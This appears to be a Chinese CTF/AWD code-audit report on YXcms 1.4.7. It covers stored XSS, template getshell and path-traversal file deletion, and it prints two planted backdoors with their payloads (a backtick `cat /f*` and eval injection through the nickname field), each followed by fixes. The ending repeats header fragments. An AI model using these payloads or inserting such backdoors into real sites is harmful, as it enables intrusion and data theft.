YXcms 1.4.7 代码审计与漏洞分析报告<\/h1>

0x01 前言<\/h2>
本文档对YXcms 1.4.7版本进行了全面的代码审计，发现了多个安全漏洞，包括官方版本存在的漏洞和比赛方添加的后门。这些漏洞涉及前台XSS、后台getshell、任意文件删除等多种类型，对系统安全构成严重威胁。<\/p>

0x02 系统概述<\/h2>

YXcms 1.4.7是一个基于MVC架构的内容管理系统，主要特点包括：<\/p>

采用MVC路由模式<\/li>
前后台分离设计<\/li>
存在多个自定义表和扩展功能<\/li>

官方版本存在多个未修复的安全漏洞<\/li> <\/ul>

0x03 官方漏洞分析<\/h2>

3.1 前台存储型XSS漏洞<\/h3>

漏洞位置<\/strong>：留言功能模块<\/p>

漏洞描述<\/strong>：<\/p>

前台留言内容未经过滤直接插入数据库<\/li>
后台读取时也未进行过滤处理<\/li> <\/ul>
关键代码<\/strong>：<\/p>
\/\/ protected\/apps\/admin\/controller\/extendfieldController.php <\/span><\/span><\/span><\/span>public<\/span> function<\/span> mesedit<\/span>() <\/span><\/span>{ <\/span><\/span> $tableid=<\/span>intval<\/span>($_GET['tabid'<\/span>]); <\/span><\/span> if<\/span>(!<\/span>$this-><\/span>checkConPower<\/span>('extend'<\/span>,$tableid)) $this-><\/span>error<\/span>('您没有权限管理此独立表内容~'<\/span>); <\/span><\/span> $id=<\/span>intval<\/span>($_GET['id'<\/span>]);\/\/信息id <\/span><\/span><\/span><\/span> if<\/span>(empty<\/span>($tableid) ||<\/span> empty<\/span>($id) ) $this-><\/span>error<\/span>('参数错误~'<\/span>); <\/span><\/span> $tableinfo =<\/span> model<\/span>('extend'<\/span>)-><\/span>select<\/span>("id='<\/span>{<\/span>$tableid}<\/span>' OR pid='<\/span>{<\/span>$tableid}<\/span>'"<\/span>,'id,tableinfo,name,type,defvalue'<\/span>,'pid,norder DESC'<\/span>); <\/span><\/span> if<\/span>(empty<\/span>($tableinfo)) $this-><\/span>error<\/span>('自定义表不存在~'<\/span>); <\/span><\/span> if<\/span> (!<\/span>$this-><\/span>isPost<\/span>()) { <\/span><\/span> $info=<\/span>model<\/span>('extend'<\/span>)-><\/span>Extfind<\/span>($tableinfo[0<\/span>]['tableinfo'<\/span>],"id='<\/span>{<\/span>$id}<\/span>'"<\/span>); <\/span><\/span> $this-><\/span>info<\/span>=<\/span>$info; <\/span><\/span> $this-><\/span>tableid<\/span>=<\/span>$tableid; <\/span><\/span> $this-><\/span>id<\/span>=<\/span>$id; <\/span><\/span> $this-><\/span>tableinfo<\/span>=<\/span>$tableinfo; <\/span><\/span> $this-><\/span>display<\/span>(); <\/span><\/span> } <\/span><\/span> ...<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p> 在前台留言中插入恶意脚本<\/li> 管理员查看留言时触发XSS<\/li> <\/ol> 修复建议<\/strong>：<\/p> 前台和后台都应添加HTML实体编码过滤<\/li> 使用专门的XSS过滤函数处理用户输入<\/li> <\/ul> 3.2 后台模板getshell漏洞<\/h3> 漏洞位置<\/strong>：后台模板管理功能<\/p> 漏洞描述<\/strong>：<\/p> 后台存在可直接编辑模板的功能<\/li> 无需管理员权限即可访问<\/li> <\/ul> 关键文件<\/strong>：\/protected\/apps\/default\/view\/default\/1.php<\/code><\/p> 利用方式<\/strong>：<\/p> 通过模板编辑功能上传恶意PHP代码<\/li> 直接访问模板文件执行任意代码<\/li> <\/ol> 修复建议<\/strong>：<\/p> 严格限制模板编辑权限<\/li> 对模板文件内容进行安全检测<\/li> 禁止直接执行模板文件<\/li> <\/ul> 3.3 任意文件删除漏洞<\/h3> 漏洞位置<\/strong>：photo控制器下的delpic方法<\/p> 漏洞描述<\/strong>：<\/p> 参数picname完全可控<\/li> 未对文件路径进行限制<\/li> 可删除服务器上任意文件<\/li> <\/ul> 关键代码<\/strong>：<\/p> \/\/ protected\/apps\/admin\/controller\/photoController.php <\/span><\/span><\/span><\/span>public<\/span> function<\/span> delpic<\/span>() <\/span><\/span>{ <\/span><\/span> if<\/span>(empty<\/span>($_POST['picname'<\/span>])) $this-><\/span>error<\/span>('参数错误~'<\/span>); <\/span><\/span> $picname=<\/span>$_POST['picname'<\/span>]; <\/span><\/span> $path=<\/span>$this-><\/span>uploadpath<\/span>; <\/span><\/span> if<\/span>(file_exists<\/span>($path.<\/span>$picname)) <\/span><\/span> @<\/span>unlink<\/span>($path.<\/span>$picname); <\/span><\/span> else<\/span>{echo<\/span> '图片不存在~'<\/span>;return<\/span>;} <\/span><\/span> if<\/span>(file_exists<\/span>($path.<\/span>'thumb_'<\/span>.<\/span>$picname)) <\/span><\/span> @<\/span>unlink<\/span>($path.<\/span>'thumb_'<\/span>.<\/span>$picname); <\/span><\/span> else<\/span> {echo<\/span> '缩略图不存在~'<\/span>;return<\/span>;} <\/span><\/span> echo<\/span> '原图以及缩略图删除成功~'<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p> 构造恶意picname参数，如..\/..\/..\/config.php<\/code><\/li> 发送POST请求删除关键系统文件<\/li> <\/ol> 修复建议<\/strong>：<\/p> 严格限制picname参数格式<\/li> 检查文件路径是否在允许目录内<\/li> 添加操作日志记录<\/li> <\/ul> 0x04 比赛方添加的后门分析<\/h2> 4.1 后门一：命令执行漏洞<\/h3> 漏洞位置<\/strong>：protected\/apps\/default\/view\/default\/extend_guestbook.php<\/code><\/p> 漏洞描述<\/strong>：<\/p> 隐藏输入框中直接使用反引号执行系统命令<\/li> 可读取服务器上的敏感文件<\/li> <\/ul> 关键代码<\/strong>：<\/p> <<\/span>input<\/span> type<\/span>=<\/span>"hidden"<\/span> class<\/span>=<\/span>"input"<\/span> name<\/span>=<\/span>"qq"<\/span> placeholder<\/span>=<\/span>"<?php echo `cat \/f*`;?>"<\/span> \/><\/span> <\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p> 访问留言页面<\/li> 查看页面源代码获取命令执行结果<\/li> <\/ol> 修复建议<\/strong>：<\/p> 删除恶意代码行<\/li> 审查所有视图文件中的可疑代码<\/li> <\/ul> 4.2 后门二：eval代码执行漏洞<\/h3> 漏洞位置<\/strong>：protected\/apps\/member\/view\/index_welcome.php<\/code><\/p> 漏洞描述<\/strong>：<\/p> 使用eval函数动态执行用户控制的nickname<\/li> 通过变量注入实现任意代码执行<\/li> <\/ul> 关键代码<\/strong>：<\/p> <<\/span>td<\/span>><\/span>当前用户<\/span>:<<\/span>font<\/span> color<\/span>=<\/span>"blue"<\/span>><?<\/span>php<\/span> eval<\/span>("echo <\/span>${<\/span>auth['nickname']}<\/span>;"<\/span>);?><\/span><\/font><\/td> <\/span><\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p> 注册用户并设置nickname为恶意代码，如${include '\/flag'}<\/code><\/li> 登录后访问用户主页触发代码执行<\/li> <\/ol> 修复建议<\/strong>：<\/p> 将eval语句替换为直接输出：{$auth['nickname']}<\/code><\/li> 对用户输入的nickname进行严格过滤<\/li> 限制nickname的字符集<\/li> <\/ul> 0x05 防御与修复建议<\/h2> 输入验证<\/strong>：<\/p> 对所有用户输入进行严格过滤<\/li> 使用白名单机制限制输入格式<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 实施最小权限原则<\/li> 后台功能需严格权限检查<\/li> <\/ul> <\/li> 安全编码<\/strong>：<\/p> 避免使用eval、system等危险函数<\/li> 使用预处理语句防止SQL注入<\/li> <\/ul> <\/li> 日志审计<\/strong>：<\/p> 记录所有敏感操作<\/li> 定期审查系统日志<\/li> <\/ul> <\/li> 后门检测<\/strong>：<\/p> 定期进行代码审计<\/li> 使用文件完整性监控工具<\/li> <\/ul> <\/li> <\/ol> 0x06 总结<\/h2> YXcms 1.4.7版本存在多个严重安全漏洞，包括：<\/p> 前台存储型XSS<\/li> 后台模板getshell<\/li> 任意文件删除<\/li> 比赛方添加的命令执行和代码执行后门<\/li> <\/ul> 这些漏洞的组合利用可导致系统完全沦陷。建议开发者立即修复这些漏洞，管理员应检查系统是否已被植入后门。在AWD比赛中，快速发现和利用这些漏洞是取胜的关键，同时也需要防范对手利用这些漏洞进行攻击。<\/p>

YXcms 1.4.7 代码审计与漏洞分析报告<\/h1>

0x01 前言<\/h2> 本文档对YXcms 1.4.7版本进行了全面的代码审计，发现了多个安全漏洞，包括官方版本存在的漏洞和比赛方添加的后门。这些漏洞涉及前台XSS、后台getshell、任意文件删除等多种类型，对系统安全构成严重威胁。<\/p>

0x03 官方漏洞分析<\/h2>

0x04 比赛方添加的后门分析<\/h2>

0x01 前言<\/h2>
本文档对YXcms 1.4.7版本进行了全面的代码审计，发现了多个安全漏洞，包括官方版本存在的漏洞和比赛方添加的后门。这些漏洞涉及前台XSS、后台getshell、任意文件删除等多种类型，对系统安全构成严重威胁。<\/p>